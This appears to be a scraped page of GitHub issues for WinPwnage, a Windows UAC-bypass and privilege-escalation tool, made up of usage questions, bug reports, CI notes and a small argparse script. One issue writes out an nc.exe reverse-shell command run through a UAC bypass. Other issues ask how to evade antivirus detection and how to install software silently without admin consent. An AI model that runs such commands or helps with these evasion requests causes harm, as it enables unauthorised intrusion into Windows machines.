rootm0s / winpwnage Goto Github PK

This is a task on #19 Can you please try out this locallly and tune it to your preferences?

Once it is the right stuff, we can add it into #41.

usage: argparse_hack.py [-h]
                        {scan,use} {uac,persist,elevate,execute}
                        [function_number] [target]

positional arguments:
  {scan,use}            'scan' shows information and 'use' applies a function
  {uac,persist,elevate,execute}
  function_number       'use' only: function ID in the function group
  target                'use' only: filepath to the target

optional arguments:
  -h, --help            show this help message and exit

#!/usr/bin/env python3

import argparse


def parse_the_args():
    scan_or_use = ("scan", "use")
    choices = "uac persist elevate execute".split()
    parser = argparse.ArgumentParser()
    parser.add_argument("scan_or_use", choices=scan_or_use,
                        help="'scan' shows information and 'use' applies a function")
    parser.add_argument("function_group", choices=choices)
    parser.add_argument("function_number", default=0, type=int, nargs="?",
                        help="'use' only: function ID in the function group")
    parser.add_argument("target", default="C:windows\\system32\\cmd.exe", nargs="?",
                        help="'use' only: filepath to the target")
    print("=" * 10)
    parser.print_help()
    print("=" * 10)

    for verb in scan_or_use:
        for choice in choices:
            print(verb, choice, 1)
            print(parser.parse_args([verb, choice, "1"]))

    # Should exit with error
    print(parser.parse_args([]))


if __name__ == '__main__':
    parse_the_args()

which of this UAC techniques bypass if UAC set to ALWAYS NOTIFY?

Says it all, windows defender able to stop almost every usable way in windows 10 1703

Hi folks, great project--thank you for making this happen.

I would like to potentially use this project as part of my own side project, as well, but as it stands software without a license cannot be copied, reused, modified or distributed legally. If this is intentional, please feel free to close the issue; otherwise, I suggest an open source license such as the MIT License be used.

I set it up.How this tool is used. There are no documents. Can you write a few examples?

Hi could you add the cmstp privesc pls?

Hi,

Here is another way for bypassing uac => https://www.activecyber.us/activelabs/windows-uac-bypass
I put it here to remember it, if you don't have time, I will take a look on it but right now, I have no time sorry :)

Elevate from Administrator to SYSTEM using named pipe impersonation is currently broken when using python 3:

• https://github.com/rootm0s/WinPwnage/blob/master/winpwnage/functions/elevate/elevate_named_pipe_impersonation.py

Feel free to send PR if you want to help! 👍

you should at first convert cpp to python.
here is some Vulnerability:
https://github.com/WindowsExploits/Exploits
https://github.com/hfiref0x/CVE-2015-1701
https://github.com/SecWiki/windows-kernel-exploits

why when using schtasks.exe bypass in uac4, we can't elevate with windows service in elevate6?
other uac bypasses can run elevate6.

Perhaps it would be a good idea to add a command to the end of the .travis.yml file that runs the app.

• Does it run as expected in Python 2?
• Does it run as expected in Python 3?

i see the code seem still on python 2, correct me if i am wrong

Thx 😃

Can I get CASPER:socket based rat? As its been removed...

ok i gone through those articles but seems not getting to find anyone helpful. how can someone reproduce this in non python installed environment?

Travis-ci tests fails with python3, help needed!

Issue:
https://travis-ci.com/github/rootm0s/WinPwnage/jobs/306780696

Failures easy.install (exited -1) - Error while running 'C:\ProgramData\chocolatey\lib\easy.install\tools\chocolateyInstall.ps1'. See log for details. The command "choco install pip" failed and exited with 127 during .

Documentation:
https://chocolatey.org/packages/pip#install

can i ask for some help with modifying something?

like in core.winstructures

class LUID(Structure):
     _fields_ = [('LowPart', DWORD),
				('HighPart', LONG)]

• tabs, spaces are mixed
• inconsistent spaces width with other classes

On Travis CI Windows environments, running python build.py install raises:
error: bundle-files 1 not yet supported on win64

Is there a way to successfully complete the build process?

sc start testserv
sc stop testserv
sc delete testserv

from admin to system privilege(non interactive)

Hello, many of the UAC elevations are blocked(by WinDefender), but that's not an issue, but the 12th function is real bad. It blocks changing the specific registry key, but other than that leaves it there resulting in explorer not working correctly. The regKey gets written with null and clicking any folder in explorer now spawns a new empty window.
This is just FIY if anyone has a problem with explorer after messing with this.

title

for example persistMethod4 doesn't support using exe with params.
but persistMethod5 and persistMethod6 supports exe with params.

• If a function fails, it does not auto-clean anymore.

Function elevate_mofcomp.py is currently broken.

Sometimes it spawns an elevated process and sometimes it doesn't. The automatic clean-up is also broken at the moment.

Will patch this in near future.

Sometimes WinPwnage quits after successfully executing payload, so it skips the cleaning part.

[!] Attempting to run id (20) configured with payload (['c:\\windows\\system32\\cmd.exe', '/c', 'mspaint.exe'])
[+] Successfully created Default and DelegateExecute key containing payload (c:\windows\system32\cmd.exe /c mspaint.exe )
[!] Disabling file system redirection
[+] Successfully disabled file system redirection
[!] Waiting for wsreset.exe to finish, this can take a few seconds

Exits while it's supposed to wait for it to finish. The payload get's still executed once wsrest.exe is done with all the work.

Seems to happen on different functions as well. Not sure why it happens yet!

They are all free for Open Source projects like this one.

https://github.com/marketplace/category/continuous-integration

what are command for persistence and execution techniques?

The to-do list:

• Update all the "print_" messages so they make more sense
• Update all function descriptions so they are correct
• Update README
• A better way to do cleanup. Right now.. if function returns False in early stage, this prevents the cleanup in most of the functions. (Fixed in: f8dd0a6)
• Restructure winstructures, it's all messy right now
• Convert the code to python3 but keep python2 support so Pupy (https://github.com/n1nj4sec/pupy) can work
• Add automated testing (Travis CI, AppVeyor, etc.)
• Replace all sys.argv[] calls from main.py and use argparse instead (Fixed in: 7de4146)
• Deprecate py2exe support
• Remove py2exe from README
• Add better way to display the scan results
• Change Syntax winpwnage.py in README to main.py
• Deprecate DLL based methods/functions
• Remove Python2 support

Is there something more interesting that we could do at the end of the automated test?

We currently just run the four -scans but is there some -use commands as well?

https://github.com/rootm0s/WinPwnage/blob/master/.travis.yml#L84-L88

python winpwnage.py -scan -uac
python winpwnage.py -scan -persist
python winpwnage.py -scan -elevate
python winpwnage.py -scan -execute

This tool is detected by antivirus
how can i encoding this tool for anti detect?

Hey,

I tried with 2nd and 13th function of UAC, but cmd is never spawned, although there are no error messages. Any ideas?

Traceback (most recent call last):
File "winpwnage.py", line 4, in
from winpwnage.core.scanner import scanner, function
File "/home/xubuntu/tools/WinPwnage/winpwnage/core/scanner.py", line 1, in
from winpwnage.functions.uac.uac_runas import *
File "/home/xubuntu/tools/WinPwnage/winpwnage/functions/uac/uac_runas.py", line 2, in
from winpwnage.core.utils import *
File "/home/xubuntu/tools/WinPwnage/winpwnage/core/utils.py", line 7, in
import winreg as _winreg
File "/usr/local/lib/python2.7/dist-packages/winreg/init.py", line 6, in
from _winreg import *
ImportError: No module named _winreg

I tried using UAC bypass 4. Intitially, it said it could not find the schtasks executable. To fix this, I used os.system instead of the process method you made. Still, all that happens is you see a working cursor. No payload is spawned.

how can i make it so when i click the exe it open the command prompt and runs a pre-specified command? instead of opening cmd and writing "winpwnage.exe --use uac --id 2 --payload start cmd /k whoami" but instead i just click the exe and it does that for me?

How do i make this a exe? I want to still tinker around with the python code but how do i turn it into a exe afterwards?

so instead of using the cli, im using python code

i can successfully bypass a single executable, but I cant bypass two within the same script which makes me believe [without looking at the code] that there code that is telling it to exit, as python code does not normally exit the script without the dev specifically telling it to do so, so I am kinda wondering about this
this project is awesome! btw :D

from time import sleep
from winpwnage.functions.uac.uacMethod4 import uacMethod4


f1 = r"C:\Users\nubonix\sandboxie\sandboxie.exe"
f2 = r"C:\Users\nubonix\Desktop\WinPwnage\dist\cli\cli.exe"
uacMethod4([f1])
sleep(30)  # after various re-trials of trying to get more than one executable to be bypassed within the same script/program, this was my sanity check
uacMethod4([f2])

after above cleanup, the windows will go to problem in its environment. so some of the windows features won't work because they don't have %windir% value in environment.
don't remove registry value or key.
you should write its real value in the registry after you got access by this way.

not just this method, you should apply this fix for all registry methods

Hello and thank you for the useful tool!

I would like to ask for clarification concerning the --payload parameter. The help output indicates it is possible to pass parameters to the payload.

When I do .\winpwnage.exe -u uac -i 3 -p "c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333", I get the error that the payload is invalid. I can guess why, because it tries to find an executable named like the fully quoted string.

But when I do .\winpwnage.exe -u uac -i 3 -p c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333, without the quotes, winpwnage aborts because it tries to interpret the -e option by its own.

How does passing parameters to the payload work in this case? And how is it even possible to distinguish payload parameters from further payloads? (The latter question arises because --payload is defined with nargs="+".)

Can we use this module for installation of an app like notepad++ as admin without uac prompt in a standard account. Or can we pass the username and password to install exe apps in a machine silently...

I'm trying to convert this project to exe file with pyinstaller --onefile winpwnage.py command
the process was complete successfully , but when execute the exe file in dist folder not thing is happen, and there is no output to screen

When [-] is printed then WinPwnage should not exit with 0. This will signal the calling script that a failure has occurred.

[-] Technique not compatible with this system.
The command "$RUN_WINPWNAGE -use -uac 1 /c/windows/system32/cmd.exe" exited with 0.

• https://travis-ci.com/rootm0s/WinPwnage/jobs/187405512#L229-L230
• https://travis-ci.com/rootm0s/WinPwnage/jobs/187405512#L313-L314
• https://travis-ci.com/rootm0s/WinPwnage/jobs/187405512#L330-L331
• https://travis-ci.com/rootm0s/WinPwnage/jobs/187405512#L347-L348